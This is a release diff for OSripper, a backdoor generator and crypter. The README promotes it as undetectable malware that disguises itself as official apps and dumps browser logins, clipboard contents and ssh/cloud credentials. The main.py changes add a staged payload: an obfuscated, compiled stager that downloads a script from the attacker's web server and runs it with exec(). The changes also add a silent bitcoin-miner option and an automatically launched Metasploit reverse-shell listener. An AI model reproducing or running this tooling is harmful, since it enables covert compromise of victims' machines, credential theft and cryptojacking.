v0.3

v0.3 Release

Author: SubGlitch1

README.MD

@@ -37,13 +37,16 @@ Please select a module:
 OSripper is a fully undetectable Backdoor generator and Crypter which specialises in OSX M1 malware. It will also work on windows but for now there is no support for it and it IS NOT FUD for windows (yet at least) and for now i will not focus on windows.
 
 
-#Attention
-I know that i have promised to update within a week. this was aroud a month ago. i want you to know that the delay is partly because i have been busy with work and university. The main reason however is that i have found some interesting new techniques which will fundamentally change this Framework. For this reason i am still researching and developing these techniques. Therefore, for V0.3 i am planning to integrate polymorphic shellcode in C for both windows and linux. The project will therefore cease of focusing on MacOS and develop into a full flexed cross platform framework. I have already gotten the shells down to 0 detection on VT. Now i am on the last step of this update by also accomplishing this for staged meterpreters. Thank you for your patience 
+# Update
+This is the first v0.3 Release. The payloads will now be double staged in order to evade av detection. Please keep in mind that i develop on arch and only test on a few platforms so there are sure to be bugs and you should open issues for them. 
+Biggest difference to last release is that this project isnt focused on macOS anymore but on all platforms. It also now features a web server on which the staged payload is stored. I will develop this server into a C2 to which data will be pushed from the victim.
+With this update the developtment is officially back in progress.
 
 
 
 
 ## Features
+- Staged payloads
 - FUD (for macOS)
 - Cloacks as an official app (Microsoft, ExpressVPN etc)
 - Dumps; Sys info, Browser History, Logins, ssh/aws/azure/gcloud creds, clipboard content, local users etc. (more on Cedric Owens swiftbelt)

main.py

@@ -12,6 +12,9 @@
 from ripgrok import get_tunnels
 import random
 from pickle import GLOBAL
+import subprocess
+
+
 
 bind = 0
 ## RandomVariables
@@ -150,6 +153,8 @@ def logo():
     print(random.choice(logolist))
 
 
+def move_file_to_directory(file_path, destination_directory):
+    shutil.move(file_path, destination_directory)
 clear = lambda: os.system("clear")
 clear()
 logo()
@@ -552,6 +557,12 @@ def postgen():
             print(logo)
             print('Backdoor saved under "dist" folder')
 
+def start_web_server(webroot):
+    command = ["python3", "-m", "http.server", "--directory", webroot]
+
+    # Start the web server as a background process
+    subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
+
 
 def rep_syst():
     hide = input(
@@ -713,16 +724,39 @@ def cleanup():
     except FileNotFoundError:
         pass
 
-
+def webdelivery():
+    with open ("backdoor.py","a+") as outs:
+        specf="destin='http://"+host+":8000/ocr_or.py'"
+        websc= """
+import requests
+import subprocess
+import time
+import random
+def download_and_run_script(url):
+    response = requests.get(url)
+    script_content = response.text
+    exec(script_content)
+
+script_url = destin
+download_and_run_script(script_url)
+        """
+        outs.write(specf)
+        outs.write(websc)
+    import obfuscator
+    obfuscator.MainMenu("backdoor.py")
+    os.system("python3 -m nuitka --standalone --include-module=sandboxed --disable-console --onefile --assume-yes-for-downloads backdoor_or.py")
 print(
     """
     
         1. Create Bind Backdoor (opens a port on the victim machine and waits for you to connect)
         2. Create Encrypted TCP Meterpreter (can embed in other script) (recommended)
-        3. Create Obfuscated file with custom code
+        3. Crypt custom code
         ##########################################################################################
                                                 Miners
         4. Create a silent BTC miner
+        ##########################################################################################
+                                            Staged Payloads
+        5. Create Encrypted Meterpreter (staged)
         
 """
 )
@@ -821,5 +855,45 @@ def cleanup():
             print('Miner saved under "dist" folder')
     print("You can monitor your `miners` here : https://solo.ckpool.org/")
     cleanup()
+if nscan == "5":
+    clear()
+    logo()
+    print(
+        "##########################################################################################"
+    )
+    print("Generating")
+    gen_rev_ssl_tcp()
+    clear()
+    logo()
+    print(
+        "##########################################################################################"
+    )
+
+
+    b = "".join(
+        secrets.choice(string.ascii_uppercase + string.ascii_lowercase)
+        for i in range(13)
+    )
+
+    encrypted = True
+    import obfuscator
+
+    obfuscator.MainMenu(name)
+    file_path = "ocr_or.py"
+    destination_directory = "webroot"
+    move_file_to_directory(file_path, destination_directory)
+    webdelivery()
+    webroot = "webroot"
+    start_web_server(webroot)
+    print("web server started in the beackground on port 8000. the backdoor is saved as backdoor_or.py and if you have compiled it it will be in the nuitka folder")
+    print("wait...")
+    a = (
+            "msfconsole -q -x 'use multi/handler;set payload python/meterpreter/reverse_tcp_ssl;set LHOST 0.0.0.0; set LPORT "
+            + port
+            + "; exploit'"
+        )
+    os.system(a)
+
+
 else:
     print("Please select a vaild option")

webroot/readme.txt

@@ -0,0 +1,2 @@
+dont touch this directory 
+-SG1